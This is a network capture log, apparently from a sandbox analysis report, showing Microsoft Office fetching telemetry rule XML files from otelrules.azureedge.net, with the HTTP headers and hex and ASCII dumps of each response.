Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
112192.168.2.55262013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:58 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:58 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:58 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
ETag: "0x8DC582BDC2EEE03"
x-ms-request-id: 689eda34-b01e-0098-359c-29cead000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025558Z-r197bdfb6b47gqdjvmbpfaf2d000000002rg0000000025k8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:58 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session IDSource IPSource PortDestination IPDestination Port
113192.168.2.55262113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:58 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:58 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:58 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
ETag: "0x8DC582BEA414B16"
x-ms-request-id: cce14155-601e-000d-601a-292618000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025558Z-r197bdfb6b48pl4k4a912hk2g400000006q00000000097ym
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:58 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


Session IDSource IPSource PortDestination IPDestination Port
114192.168.2.55262213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:58 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:58 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:58 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
ETag: "0x8DC582BE1CC18CD"
x-ms-request-id: 54290c1c-d01e-008e-01bf-27387a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025558Z-16849878b78tg5n42kspfr0x4800000007gg0000000041ca
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:58 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


Session IDSource IPSource PortDestination IPDestination Port
115192.168.2.55262313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:59 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:59 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:59 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB256F43"
x-ms-request-id: 38ae9a1e-e01e-0099-4193-27da8a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025559Z-r197bdfb6b4skzzvqpzzd3xetg00000006u000000000c0sm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:59 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
116192.168.2.55262413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:59 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:59 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:59 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB866CDB"
x-ms-request-id: 5ece5f0b-101e-0028-1a52-268f64000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025559Z-r197bdfb6b46kdskt78qagqq1c00000007m000000000fq2e
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:59 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session IDSource IPSource PortDestination IPDestination Port
117192.168.2.55262513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:59 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:59 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:59 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
ETag: "0x8DC582BE5B7B174"
x-ms-request-id: a3881376-a01e-000d-19f4-27d1ea000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025559Z-r197bdfb6b46kdskt78qagqq1c00000007q0000000008n8t
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:59 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


Session IDSource IPSource PortDestination IPDestination Port
118192.168.2.55262613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:59 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:59 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:59 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
ETag: "0x8DC582BE976026E"
x-ms-request-id: 05f3f012-b01e-0070-4973-271cc0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025559Z-17c5cb586f6f8m6jnehy0z65x400000006pg00000000aevm
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:59 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


Session IDSource IPSource PortDestination IPDestination Port
119192.168.2.55262713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:59 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:59 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:59 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
ETag: "0x8DC582BDC13EFEF"
x-ms-request-id: a9595a72-801e-0015-2bad-26f97f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025559Z-16849878b787bfsh7zgp804my4000000064000000000s512
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:59 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
120192.168.2.55262813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:00 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:00 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:00 GMT
Content-Type: text/xml
Content-Length: 1425
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE6BD89A1"
x-ms-request-id: 2cda3f02-b01e-0021-7c8c-27cab7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025600Z-r197bdfb6b46kdskt78qagqq1c00000007t0000000000s77
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:56:00 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


Session IDSource IPSource PortDestination IPDestination Port
121192.168.2.55262913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:00 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:00 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:00 GMT
Content-Type: text/xml
Content-Length: 1388
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
ETag: "0x8DC582BDBD9126E"
x-ms-request-id: e02f31dd-001e-0082-0849-275880000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025600Z-16849878b78zqkvcwgr6h55x9n00000006xg000000006yz3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:00 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


Session IDSource IPSource PortDestination IPDestination Port
122192.168.2.55263013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:00 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:00 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:00 GMT
Content-Type: text/xml
Content-Length: 1415
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
ETag: "0x8DC582BE7C66E85"
x-ms-request-id: 2ea78088-901e-0083-5428-26bb55000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025600Z-15b8d89586fwzdd8urmg0p1ebs0000000k0g00000000cv19
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:00 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session IDSource IPSource PortDestination IPDestination Port
123192.168.2.55263113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:00 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:00 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:00 GMT
Content-Type: text/xml
Content-Length: 1378
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
ETag: "0x8DC582BDB813B3F"
x-ms-request-id: c032846d-701e-005c-2d58-27bb94000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025600Z-16849878b7898p5f6vryaqvp58000000087000000000g974
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
